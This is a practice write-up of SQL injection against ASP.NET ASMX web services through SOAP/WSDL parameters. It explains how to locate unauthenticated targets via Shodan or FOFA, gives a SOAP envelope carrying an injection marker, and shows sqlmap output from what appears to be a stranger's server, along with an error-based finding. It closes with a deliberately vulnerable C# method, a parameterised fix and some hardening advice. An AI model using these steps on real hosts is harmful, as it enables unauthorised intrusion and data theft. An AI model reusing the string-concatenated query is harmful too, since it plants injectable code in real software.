By a bit of luck I came across a new angle on SQL injection, so I am writing it down here.
It counts as a form of SQL injection called WSDL injection; it was new to me when I first ran into it, hence this note. My writing is poor and my understanding of injection is shallow, so bear with me, masters and mentors.
This is just a simple practice write-up; I found it really interesting.
Picking a target
Search for asmx on Shodan or FOFA and find sites that look like they have WSDL injection (unauthenticated). The URL looks roughly like this: http://vuln_ip:8081/WebService1.asmx?WSDL
Usually we can try the injection manually. Opening such a site returns an XML-like document listing the parameters used to talk to the server, for instance the username and passwd parameters of a login page; the developers have already configured all of these.
Below is the XML tag that corresponds to one parameter:
<s:element name="HelloWorldResponse">
  <s:complexType>
    <s:sequence>
      <s:element minOccurs="0" maxOccurs="1" name="HelloWorldResult" type="s:string"/>
    </s:sequence>
  </s:complexType>
</s:element>
Running it through sqlmap
WSDL injection
The manual approach is to build a POST body carrying a SOAP request with the corresponding parameter and send it to the asmx page. The POST body looks like this:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <urn:HelloWorldResult>
      <urn:ins>1*</urn:ins>
    </urn:HelloWorldResult>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
That is roughly the idea behind constructing the request; then watch how the server's database reports errors. We can also take that POST body as-is and let sqlmap run it:
root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch
[sqlmap banner: 1.2.4#stable, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program
[*] starting at 11:03:20
[11:03:54] [INFO] testing Microsoft SQL Server
[11:03:54] [INFO] confirming Microsoft SQL Server
[11:04:24] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[11:04:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 19 times
[11:04:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'
[*] shutting down at 11:04:24
The injection payload, shown separately:
---
Parameter: SOAP #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based
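To show what sits behind an envelope like the one above, here is an added example (not the target's code, and not from the original post) of an ASMX web method shaped like the HelloWorld operation with an ins parameter, first in the form the error-based finding implies, then parameterised. The connection string, table and column names are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web.Services;

// Assumed ASMX service matching the http://tempuri.org/ namespace seen in the WSDL.
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class WebService1 : WebService
{
    // Assumed connection string; not taken from the post.
    private const string ConnStr = "Server=.;Database=AppDb;Integrated Security=true;";

    // Vulnerable form: the SOAP parameter "ins" is spliced into the SQL text, so a
    // value that closes the string literal turns the remainder into SQL. SQL Server's
    // error message then comes back inside the HTTP 500 SOAP fault, which is the
    // error-based channel sqlmap reported above.
    [WebMethod]
    public string HelloWorldUnsafe(string ins)
    {
        using (var cn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand("SELECT Name FROM Items WHERE Id = '" + ins + "'", cn))
        {
            cn.Open();
            return Convert.ToString(cmd.ExecuteScalar());
        }
    }

    // Hardened form: validate the type up front and bind the value as a typed
    // SqlParameter, so it can never alter the statement structure.
    [WebMethod]
    public string HelloWorld(string ins)
    {
        int id;
        if (!int.TryParse(ins, out id))
            throw new ArgumentException("ins must be an integer id");

        using (var cn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand("SELECT Name FROM Items WHERE Id = @id", cn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            cn.Open();
            return Convert.ToString(cmd.ExecuteScalar());
        }
    }
}
```

Two further checks for the defending side: leave customErrors on so database exception text is not echoed in SOAP faults, and do not expose ?WSDL and the service endpoint without authentication, since the unauthenticated WSDL is what made the target findable in the first place.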